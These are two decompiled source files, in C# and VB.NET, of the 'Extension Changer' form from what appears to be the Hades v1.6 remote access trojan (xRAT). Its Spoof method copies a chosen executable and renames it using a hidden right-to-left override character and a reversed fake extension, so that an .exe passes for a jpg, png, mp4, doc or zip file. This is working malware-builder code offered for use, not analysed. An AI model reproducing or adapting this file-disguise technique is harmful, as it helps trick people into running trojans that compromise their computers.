File: RAT/Hades v1.6/Source/xRAT.cs/xRAT/Form2.cs
namespace xRAT
{
    using Microsoft.VisualBasic;
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.ComponentModel;
    using System.Diagnostics;
    using System.Drawing;
    using System.IO;
    using System.Runtime.CompilerServices;
    using System.Windows.Forms;

    [DesignerGenerated]
    public class Form2 : Form
    {
        [AccessedThroughProperty("Button1")]
        private Button _Button1;
        [AccessedThroughProperty("ComboBox1")]
        private ComboBox _ComboBox1;
        [AccessedThroughProperty("PictureBox1")]
        private PictureBox _PictureBox1;
        [AccessedThroughProperty("PictureBox2")]
        private PictureBox _PictureBox2;
        [AccessedThroughProperty("PictureBox3")]
        private PictureBox _PictureBox3;
        [AccessedThroughProperty("ProgressBar1")]
        private ProgressBar _ProgressBar1;
        [AccessedThroughProperty("TextBox1")]
        private TextBox _TextBox1;
        private IContainer icontainer_0;
        [AccessedThroughProperty("Timer1")]
        private Timer timer_0;

        public Form2()
        {
            Class1.QaIGh5M7cuigS();
            base.Load += new EventHandler(this.Form2_Load);
            this.InitializeComponent();
        }

        private void Button1_Click(object sender, EventArgs e)
        {
            try
            {
                this.Spoof(this.TextBox1.Text, this.ComboBox1.Text);
                this.ProgressBar1.Value = Conversions.ToInteger("100");
                MessageBox.Show("Extension has changed !", "Extension Changer", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                ProjectData.ClearProjectError();
            }
        }

        private void ComboBox1_SelectedIndexChanged(object sender, EventArgs e)
        {
            if (this.ComboBox1.Text == "avi")
            {
                this.PictureBox1.Show();
                this.PictureBox2.Hide();
                this.PictureBox3.Hide();
            }
            if (this.ComboBox1.Text == "mp4")
            {
                this.PictureBox1.Show();
                this.PictureBox2.Hide();
                this.PictureBox3.Hide();
            }
            if (this.ComboBox1.Text == "zip")
            {
                this.PictureBox1.Hide();
                this.PictureBox2.Show();
                this.PictureBox3.Hide();
            }
            if (this.ComboBox1.Text == "doc")
            {
                this.PictureBox1.Hide();
                this.PictureBox2.Show();
                this.PictureBox3.Hide();
            }
            if (this.ComboBox1.Text == "png")
            {
                this.PictureBox1.Hide();
                this.PictureBox2.Hide();
                this.PictureBox3.Show();
            }
            if (this.ComboBox1.Text == "jpg")
            {
                this.PictureBox1.Hide();
                this.PictureBox2.Hide();
                this.PictureBox3.Show();
            }
        }

        [DebuggerNonUserCode]
        protected override void Dispose(bool disposing)
        {
            try
            {
                if (disposing && (this.icontainer_0 != null))
                {
                    this.icontainer_0.Dispose();
                }
            }
            finally
            {
                base.Dispose(disposing);
            }
        }

        private void Form2_Load(object sender, EventArgs e)
        {
            this.Timer1.Start();
        }

        [DebuggerStepThrough]
        private void InitializeComponent()
        {
            this.icontainer_0 = new System.ComponentModel.Container();
            ComponentResourceManager manager = new ComponentResourceManager(typeof(Form2));
            this.TextBox1 = new TextBox();
            this.ComboBox1 = new ComboBox();
            this.Button1 = new Button();
            this.ProgressBar1 = new ProgressBar();
            this.Timer1 = new Timer(this.icontainer_0);
            this.PictureBox3 = new PictureBox();
            this.PictureBox2 = new PictureBox();
            this.PictureBox1 = new PictureBox();
            ((ISupportInitialize) this.PictureBox3).BeginInit();
            ((ISupportInitialize) this.PictureBox2).BeginInit();
            ((ISupportInitialize) this.PictureBox1).BeginInit();
            this.SuspendLayout();
            Point point = new Point(12, 7);
            this.TextBox1.Location = point;
            this.TextBox1.Name = "TextBox1";
            Size size = new Size(0x145, 0x15);
            this.TextBox1.Size = size;
            this.TextBox1.TabIndex = 0;
            this.TextBox1.Text = @"C:\file.exe";
            this.ComboBox1.FormattingEnabled = true;
            this.ComboBox1.Items.AddRange(new object[] { "jpg", "png", "avi", "mp4", "doc", "zip" });
            point = new Point(0xea, 0x25);
            this.ComboBox1.Location = point;
            this.ComboBox1.Name = "ComboBox1";
            size = new Size(0x68, 0x15);
            this.ComboBox1.Size = size;
            this.ComboBox1.TabIndex = 2;
            this.ComboBox1.Text = "jpg";
            point = new Point(13, 0x41);
            this.Button1.Location = point;
            this.Button1.Name = "Button1";
            size = new Size(0x145, 0x2c);
            this.Button1.Size = size;
            this.Button1.TabIndex = 3;
            this.Button1.Text = ":: Changer Extension ::";
            this.Button1.UseVisualStyleBackColor = true;
            point = new Point(13, 0x24);
            this.ProgressBar1.Location = point;
            this.ProgressBar1.Name = "ProgressBar1";
            size = new Size(0xb9, 0x17);
            this.ProgressBar1.Size = size;
            this.ProgressBar1.TabIndex = 1;
            this.PictureBox3.BackColor = Color.Transparent;
            this.PictureBox3.Image = Class5.smethod_69();
            point = new Point(0xcc, 0x21);
            this.PictureBox3.Location = point;
            this.PictureBox3.Name = "PictureBox3";
            size = new Size(0x18, 0x1b);
            this.PictureBox3.Size = size;
            this.PictureBox3.TabIndex = 6;
            this.PictureBox3.TabStop = false;
            this.PictureBox2.BackColor = Color.Transparent;
            this.PictureBox2.Image = (Image) manager.GetObject("PictureBox2.Image");
            point = new Point(0xcc, 0x24);
            this.PictureBox2.Location = point;
            this.PictureBox2.Name = "PictureBox2";
            size = new Size(0x18, 0x19);
            this.PictureBox2.Size = size;
            this.PictureBox2.SizeMode = PictureBoxSizeMode.StretchImage;
            this.PictureBox2.TabIndex = 5;
            this.PictureBox2.TabStop = false;
            this.PictureBox1.Image = Class5.smethod_94();
            point = new Point(0xcc, 0x23);
            this.PictureBox1.Location = point;
            this.PictureBox1.Name = "PictureBox1";
            size = new Size(0x18, 0x18);
            this.PictureBox1.Size = size;
            this.PictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
            this.PictureBox1.TabIndex = 4;
            this.PictureBox1.TabStop = false;
            SizeF ef = new SizeF(6f, 13f);
            this.AutoScaleDimensions = ef;
            this.AutoScaleMode = AutoScaleMode.Font;
            size = new Size(350, 0x79);
            this.ClientSize = size;
            this.Controls.Add(this.PictureBox3);
            this.Controls.Add(this.PictureBox2);
            this.Controls.Add(this.PictureBox1);
            this.Controls.Add(this.Button1);
            this.Controls.Add(this.ComboBox1);
            this.Controls.Add(this.ProgressBar1);
            this.Controls.Add(this.TextBox1);
            this.FormBorderStyle = FormBorderStyle.FixedSingle;
            this.Icon = (Icon) manager.GetObject("$this.Icon");
            this.Name = "Form2";
            this.StartPosition = FormStartPosition.CenterScreen;
            this.Text = "Extension Changer";
            ((ISupportInitialize) this.PictureBox3).EndInit();
            ((ISupportInitialize) this.PictureBox2).EndInit();
            ((ISupportInitialize) this.PictureBox1).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();
        }

        public void Spoof(string file, string extension)
        {
            byte[] bytes = File.ReadAllBytes(file);
            File.WriteAllBytes(Application.StartupPath + "‮" + Strings.StrReverse(extension) + ".exe", bytes);
        }

        private void Timer1_Tick(object sender, EventArgs e)
        {
        }

        internal virtual Button Button1
        {
            get
            {
                return this._Button1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                EventHandler handler = new EventHandler(this.Button1_Click);
                if (this._Button1 != null)
                {
                    this._Button1.Click -= handler;
                }
                this._Button1 = value;
                if (this._Button1 != null)
                {
                    this._Button1.Click += handler;
                }
            }
        }

        internal virtual ComboBox ComboBox1
        {
            get
            {
                return this._ComboBox1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                EventHandler handler = new EventHandler(this.ComboBox1_SelectedIndexChanged);
                if (this._ComboBox1 != null)
                {
                    this._ComboBox1.SelectedIndexChanged -= handler;
                }
                this._ComboBox1 = value;
                if (this._ComboBox1 != null)
                {
                    this._ComboBox1.SelectedIndexChanged += handler;
                }
            }
        }

        internal virtual PictureBox PictureBox1
        {
            get
            {
                return this._PictureBox1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._PictureBox1 = value;
            }
        }

        internal virtual PictureBox PictureBox2
        {
            get
            {
                return this._PictureBox2;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._PictureBox2 = value;
            }
        }

        internal virtual PictureBox PictureBox3
        {
            get
            {
                return this._PictureBox3;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._PictureBox3 = value;
            }
        }

        internal virtual ProgressBar ProgressBar1
        {
            get
            {
                return this._ProgressBar1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._ProgressBar1 = value;
            }
        }

        internal virtual TextBox TextBox1
        {
            get
            {
                return this._TextBox1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._TextBox1 = value;
            }
        }

        internal virtual Timer Timer1
        {
            get
            {
                return this.timer_0;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                EventHandler handler = new EventHandler(this.Timer1_Tick);
                if (this.timer_0 != null)
                {
                    this.timer_0.Tick -= handler;
                }
                this.timer_0 = value;
                if (this.timer_0 != null)
                {
                    this.timer_0.Tick += handler;
                }
            }
        }
    }
}

File: RAT/Hades v1.6/Source/xRAT.vb/xRAT/Form2.vb
Imports Microsoft.VisualBasic
Imports Microsoft.VisualBasic.CompilerServices
Imports System
Imports System.ComponentModel
Imports System.Diagnostics
Imports System.Drawing
Imports System.IO
Imports System.Runtime.CompilerServices
Imports System.Windows.Forms

Namespace xRAT
    <DesignerGenerated> _
    Public Class Form2
        Inherits Form
        ' Methods
        Public Sub New()
            Class1.QaIGh5M7cuigS
            AddHandler MyBase.Load, New EventHandler(AddressOf Me.Form2_Load)
            Me.InitializeComponent
        End Sub

        Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
            Try 
                Me.Spoof(Me.TextBox1.Text, Me.ComboBox1.Text)
                Me.ProgressBar1.Value = Conversions.ToInteger("100")
                MessageBox.Show("Extension has changed !", "Extension Changer", MessageBoxButtons.OK, MessageBoxIcon.Asterisk)
            Catch exception1 As Exception
                ProjectData.SetProjectError(exception1)
                ProjectData.ClearProjectError
            End Try
        End Sub

        Private Sub ComboBox1_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs)
            If (Me.ComboBox1.Text = "avi") Then
                Me.PictureBox1.Show
                Me.PictureBox2.Hide
                Me.PictureBox3.Hide
            End If
            If (Me.ComboBox1.Text = "mp4") Then
                Me.PictureBox1.Show
                Me.PictureBox2.Hide
                Me.PictureBox3.Hide
            End If
            If (Me.ComboBox1.Text = "zip") Then
                Me.PictureBox1.Hide
                Me.PictureBox2.Show
                Me.PictureBox3.Hide
            End If
            If (Me.ComboBox1.Text = "doc") Then
                Me.PictureBox1.Hide
                Me.PictureBox2.Show
                Me.PictureBox3.Hide
            End If
            If (Me.ComboBox1.Text = "png") Then
                Me.PictureBox1.Hide
                Me.PictureBox2.Hide
                Me.PictureBox3.Show
            End If
            If (Me.ComboBox1.Text = "jpg") Then
                Me.PictureBox1.Hide
                Me.PictureBox2.Hide
                Me.PictureBox3.Show
            End If
        End Sub

        <DebuggerNonUserCode> _
        Protected Overrides Sub Dispose(ByVal disposing As Boolean)
            Try 
                If (disposing AndAlso (Not Me.icontainer_0 Is Nothing)) Then
                    Me.icontainer_0.Dispose
                End If
            Finally
                MyBase.Dispose(disposing)
            End Try
        End Sub

        Private Sub Form2_Load(ByVal sender As Object, ByVal e As EventArgs)
            Me.Timer1.Start
        End Sub

        <DebuggerStepThrough> _
        Private Sub InitializeComponent()
            Me.icontainer_0 = New Container
            Dim manager As New ComponentResourceManager(GetType(Form2))
            Me.TextBox1 = New TextBox
            Me.ComboBox1 = New ComboBox
            Me.Button1 = New Button
            Me.ProgressBar1 = New ProgressBar
            Me.Timer1 = New Timer(Me.icontainer_0)
            Me.PictureBox3 = New PictureBox
            Me.PictureBox2 = New PictureBox
            Me.PictureBox1 = New PictureBox
            DirectCast(Me.PictureBox3, ISupportInitialize).BeginInit
            DirectCast(Me.PictureBox2, ISupportInitialize).BeginInit
            DirectCast(Me.PictureBox1, ISupportInitialize).BeginInit
            Me.SuspendLayout
            Dim point As New Point(12, 7)
            Me.TextBox1.Location = point
            Me.TextBox1.Name = "TextBox1"
            Dim size As New Size(&H145, &H15)
            Me.TextBox1.Size = size
            Me.TextBox1.TabIndex = 0
            Me.TextBox1.Text = "C:\file.exe"
            Me.ComboBox1.FormattingEnabled = True
            Me.ComboBox1.Items.AddRange(New Object() { "jpg", "png", "avi", "mp4", "doc", "zip" })
            point = New Point(&HEA, &H25)
            Me.ComboBox1.Location = point
            Me.ComboBox1.Name = "ComboBox1"
            size = New Size(&H68, &H15)
            Me.ComboBox1.Size = size
            Me.ComboBox1.TabIndex = 2
            Me.ComboBox1.Text = "jpg"
            point = New Point(13, &H41)
            Me.Button1.Location = point
            Me.Button1.Name = "Button1"
            size = New Size(&H145, &H2C)
            Me.Button1.Size = size
            Me.Button1.TabIndex = 3
            Me.Button1.Text = ":: Changer Extension ::"
            Me.Button1.UseVisualStyleBackColor = True
            point = New Point(13, &H24)
            Me.ProgressBar1.Location = point
            Me.ProgressBar1.Name = "ProgressBar1"
            size = New Size(&HB9, &H17)
            Me.ProgressBar1.Size = size
            Me.ProgressBar1.TabIndex = 1
            Me.PictureBox3.BackColor = Color.Transparent
            Me.PictureBox3.Image = Class5.smethod_69
            point = New Point(&HCC, &H21)
            Me.PictureBox3.Location = point
            Me.PictureBox3.Name = "PictureBox3"
            size = New Size(&H18, &H1B)
            Me.PictureBox3.Size = size
            Me.PictureBox3.TabIndex = 6
            Me.PictureBox3.TabStop = False
            Me.PictureBox2.BackColor = Color.Transparent
            Me.PictureBox2.Image = DirectCast(manager.GetObject("PictureBox2.Image"), Image)
            point = New Point(&HCC, &H24)
            Me.PictureBox2.Location = point
            Me.PictureBox2.Name = "PictureBox2"
            size = New Size(&H18, &H19)
            Me.PictureBox2.Size = size
            Me.PictureBox2.SizeMode = PictureBoxSizeMode.StretchImage
            Me.PictureBox2.TabIndex = 5
            Me.PictureBox2.TabStop = False
            Me.PictureBox1.Image = Class5.smethod_94
            point = New Point(&HCC, &H23)
            Me.PictureBox1.Location = point
            Me.PictureBox1.Name = "PictureBox1"
            size = New Size(&H18, &H18)
            Me.PictureBox1.Size = size
            Me.PictureBox1.SizeMode = PictureBoxSizeMode.StretchImage
            Me.PictureBox1.TabIndex = 4
            Me.PictureBox1.TabStop = False
            Dim ef As New SizeF(6!, 13!)
            Me.AutoScaleDimensions = ef
            Me.AutoScaleMode = AutoScaleMode.Font
            size = New Size(350, &H79)
            Me.ClientSize = size
            Me.Controls.Add(Me.PictureBox3)
            Me.Controls.Add(Me.PictureBox2)
            Me.Controls.Add(Me.PictureBox1)
            Me.Controls.Add(Me.Button1)
            Me.Controls.Add(Me.ComboBox1)
            Me.Controls.Add(Me.ProgressBar1)
            Me.Controls.Add(Me.TextBox1)
            Me.FormBorderStyle = FormBorderStyle.FixedSingle
            Me.Icon = DirectCast(manager.GetObject("$this.Icon"), Icon)
            Me.Name = "Form2"
            Me.StartPosition = FormStartPosition.CenterScreen
            Me.Text = "Extension Changer"
            DirectCast(Me.PictureBox3, ISupportInitialize).EndInit
            DirectCast(Me.PictureBox2, ISupportInitialize).EndInit
            DirectCast(Me.PictureBox1, ISupportInitialize).EndInit
            Me.ResumeLayout(False)
            Me.PerformLayout
        End Sub

        Public Sub Spoof(ByVal file As String, ByVal extension As String)
            Dim bytes As Byte() = File.ReadAllBytes(file)
            File.WriteAllBytes((Application.StartupPath & ChrW(8238) & Strings.StrReverse(extension) & ".exe"), bytes)
        End Sub

        Private Sub Timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
        End Sub


        ' Properties
        Friend Overridable Property Button1 As Button
            Get
                Return Me._Button1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As Button)
                Dim handler As EventHandler = New EventHandler(AddressOf Me.Button1_Click)
                If (Not Me._Button1 Is Nothing) Then
                    RemoveHandler Me._Button1.Click, handler
                End If
                Me._Button1 = value
                If (Not Me._Button1 Is Nothing) Then
                    AddHandler Me._Button1.Click, handler
                End If
            End Set
        End Property

        Friend Overridable Property ComboBox1 As ComboBox
            Get
                Return Me._ComboBox1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As ComboBox)
                Dim handler As EventHandler = New EventHandler(AddressOf Me.ComboBox1_SelectedIndexChanged)
                If (Not Me._ComboBox1 Is Nothing) Then
                    RemoveHandler Me._ComboBox1.SelectedIndexChanged, handler
                End If
                Me._ComboBox1 = value
                If (Not Me._ComboBox1 Is Nothing) Then
                    AddHandler Me._ComboBox1.SelectedIndexChanged, handler
                End If
            End Set
        End Property

        Friend Overridable Property PictureBox1 As PictureBox
            Get
                Return Me._PictureBox1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As PictureBox)
                Me._PictureBox1 = value
            End Set
        End Property

        Friend Overridable Property PictureBox2 As PictureBox
            Get
                Return Me._PictureBox2
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As PictureBox)
                Me._PictureBox2 = value
            End Set
        End Property

        Friend Overridable Property PictureBox3 As PictureBox
            Get
                Return Me._PictureBox3
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As PictureBox)
                Me._PictureBox3 = value
            End Set
        End Property

        Friend Overridable Property ProgressBar1 As ProgressBar
            Get
                Return Me._ProgressBar1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As ProgressBar)
                Me._ProgressBar1 = value
            End Set
        End Property

        Friend Overridable Property TextBox1 As TextBox
            Get
                Return Me._TextBox1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As TextBox)
                Me._TextBox1 = value
            End Set
        End Property

        Friend Overridable Property Timer1 As Timer
            Get
                Return Me.timer_0
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As Timer)
                Dim handler As EventHandler = New EventHandler(AddressOf Me.Timer1_Tick)
                If (Not Me.timer_0 Is Nothing) Then
                    RemoveHandler Me.timer_0.Tick, handler
                End If
                Me.timer_0 = value
                If (Not Me.timer_0 Is Nothing) Then
                    AddHandler Me.timer_0.Tick, handler
                End If
            End Set
        End Property


        ' Fields
        <AccessedThroughProperty("Button1")> _
        Private _Button1 As Button
        <AccessedThroughProperty("ComboBox1")> _
        Private _ComboBox1 As ComboBox
        <AccessedThroughProperty("PictureBox1")> _
        Private _PictureBox1 As PictureBox
        <AccessedThroughProperty("PictureBox2")> _
        Private _PictureBox2 As PictureBox
        <AccessedThroughProperty("PictureBox3")> _
        Private _PictureBox3 As PictureBox
        <AccessedThroughProperty("ProgressBar1")> _
        Private _ProgressBar1 As ProgressBar
        <AccessedThroughProperty("TextBox1")> _
        Private _TextBox1 As TextBox
        Private icontainer_0 As IContainer
        <AccessedThroughProperty("Timer1")> _
        Private timer_0 As Timer
    End Class
End Namespace

